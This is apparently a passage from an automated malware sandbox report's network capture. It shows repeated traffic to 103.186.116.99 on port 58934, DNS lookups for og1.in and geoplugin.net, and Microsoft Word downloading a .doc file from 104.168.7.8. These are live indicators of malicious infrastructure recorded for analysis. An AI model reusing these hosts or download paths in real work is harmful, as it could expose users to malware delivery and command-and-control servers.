                                                                                                                                Oct 1, 2024 09:29:26.810823917 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810842991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:26.810915947 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.339018106 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.344269037 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.662436962 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.686058044 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.686104059 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:27.691611052 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691685915 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691694021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691700935 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691728115 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691735983 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691801071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691880941 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691966057 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.691973925 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696285963 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696337938 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696346045 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696352959 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696360111 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696386099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696428061 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696434975 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696443081 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696451902 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696470022 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696518898 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:27.696527004 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.354784012 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.359702110 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.676959991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.710134983 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.711630106 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:28.715099096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715109110 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715121984 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715239048 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715291977 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.715306997 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716483116 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716490984 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716499090 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.716506004 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720240116 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720248938 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720256090 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720352888 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720360994 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720367908 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720375061 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720381021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720388889 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720396042 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720494032 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720500946 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:28.720508099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.370155096 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.375294924 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.693953991 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.717158079 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.717211962 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:29.722902060 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722949982 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722963095 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722974062 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722986937 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.722997904 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723051071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723064899 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723083973 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.723105907 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748809099 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748941898 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.748972893 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749013901 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749051094 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749099016 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749123096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749145031 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749171019 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749216080 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749228001 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749238968 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:29.749560118 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.381011963 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.385972023 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.703275919 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.951226950 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:30.951292038 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.995783091 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:30.997507095 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:31.001456022 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001473904 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001554012 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001565933 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001578093 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001589060 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001600981 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001612902 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.001624107 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006680965 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006695032 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006926060 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006938934 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006948948 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006959915 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006972075 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006983042 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.006993055 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.007004976 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.007016897 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.007028103 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.007060051 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.007071972 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.395023108 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:31.399960995 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.755954027 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.782355070 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:31.782406092 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:31.787137032 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787173986 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787190914 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787269115 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787280083 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787291050 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787343025 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787364960 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787375927 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.787400007 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791903973 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791918039 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791939020 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791950941 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791961908 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.791975975 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.792006969 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.792018890 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:31.792030096 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.409070015 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:32.414238930 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.732117891 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.757190943 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:32.758394003 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:32.762039900 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762056112 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762063980 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762072086 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762116909 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762187958 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762233019 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762239933 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762247086 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.762286901 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766740084 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766748905 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766815901 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766824007 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766832113 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766846895 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766910076 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.766972065 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.767019033 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:32.767030954 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.423100948 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:33.427983046 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.750643969 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.774938107 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:33.775506020 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:33.779840946 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779850006 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779859066 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779866934 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779913902 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779922009 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779928923 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779936075 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.779983997 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.780040026 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784532070 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784539938 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784580946 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784589052 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784595966 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784627914 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784739971 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784749031 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:33.784758091 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.437010050 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:34.441886902 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.759896040 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.786956072 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:34.788373947 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:34.791814089 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.791894913 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.791996002 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792004108 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792011976 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792027950 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792036057 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792042971 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792049885 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.792058945 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796593904 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796602964 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796684980 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796694040 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796700954 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.796710968 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:34.797049999 CEST5893449176103.186.116.99192.168.2.22

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 1, 2024 09:25:06.115017891 CEST5456253192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:06.127619982 CEST53545628.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:07.899368048 CEST5291753192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:07.910640955 CEST53529178.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:07.912576914 CEST6275153192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:07.919339895 CEST53627518.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:12.443418980 CEST5789353192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:12.454793930 CEST53578938.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:12.456074953 CEST5482153192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:12.467856884 CEST53548218.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:14.102565050 CEST5471953192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:14.109524012 CEST53547198.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:14.112076044 CEST4988153192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:14.122888088 CEST53498818.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.467282057 CEST5499853192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:26.474102974 CEST53549988.8.8.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:34.116450071 CEST5278153192.168.2.228.8.8.8
                                                                                                                                Oct 1, 2024 09:25:34.125931978 CEST53527818.8.8.8192.168.2.22

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Oct 1, 2024 09:25:06.115017891 CEST192.168.2.228.8.8.80xa057Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.899368048 CEST192.168.2.228.8.8.80x363eStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.912576914 CEST192.168.2.228.8.8.80x4496Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.443418980 CEST192.168.2.228.8.8.80x1100Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.456074953 CEST192.168.2.228.8.8.80x2664Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.102565050 CEST192.168.2.228.8.8.80xb6ecStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.112076044 CEST192.168.2.228.8.8.80xd97eStandard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:26.467282057 CEST192.168.2.228.8.8.80xbbe7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:34.116450071 CEST192.168.2.228.8.8.80xec4dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Oct 1, 2024 09:25:06.127619982 CEST8.8.8.8192.168.2.220xa057No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:06.127619982 CEST8.8.8.8192.168.2.220xa057No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.910640955 CEST8.8.8.8192.168.2.220x363eNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.910640955 CEST8.8.8.8192.168.2.220x363eNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.919339895 CEST8.8.8.8192.168.2.220x4496No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:07.919339895 CEST8.8.8.8192.168.2.220x4496No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.454793930 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.454793930 CEST8.8.8.8192.168.2.220x1100No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.467856884 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:12.467856884 CEST8.8.8.8192.168.2.220x2664No error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.109524012 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.109524012 CEST8.8.8.8192.168.2.220xb6ecNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.122888088 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in104.21.78.54A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:14.122888088 CEST8.8.8.8192.168.2.220xd97eNo error (0)og1.in172.67.216.244A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:26.474102974 CEST8.8.8.8192.168.2.220xbbe7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:26.474102974 CEST8.8.8.8192.168.2.220xbbe7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:26.474102974 CEST8.8.8.8192.168.2.220xbbe7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:26.474102974 CEST8.8.8.8192.168.2.220xbbe7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                Oct 1, 2024 09:25:34.125931978 CEST8.8.8.8192.168.2.220xec4dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • og1.in
                                                                                                                                • raw.githubusercontent.com
                                                                                                                                • 104.168.7.8
                                                                                                                                • geoplugin.net

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.2249167104.168.7.8803348C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 1, 2024 09:25:18.646023035 CEST483OUTGET /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                UA-CPU: AMD64
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Host: 104.168.7.8
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 1, 2024 09:25:20.090205908 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:19 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
                                                                                                                                ETag: "10e7f-6235f5034649d"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 69247
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/msword
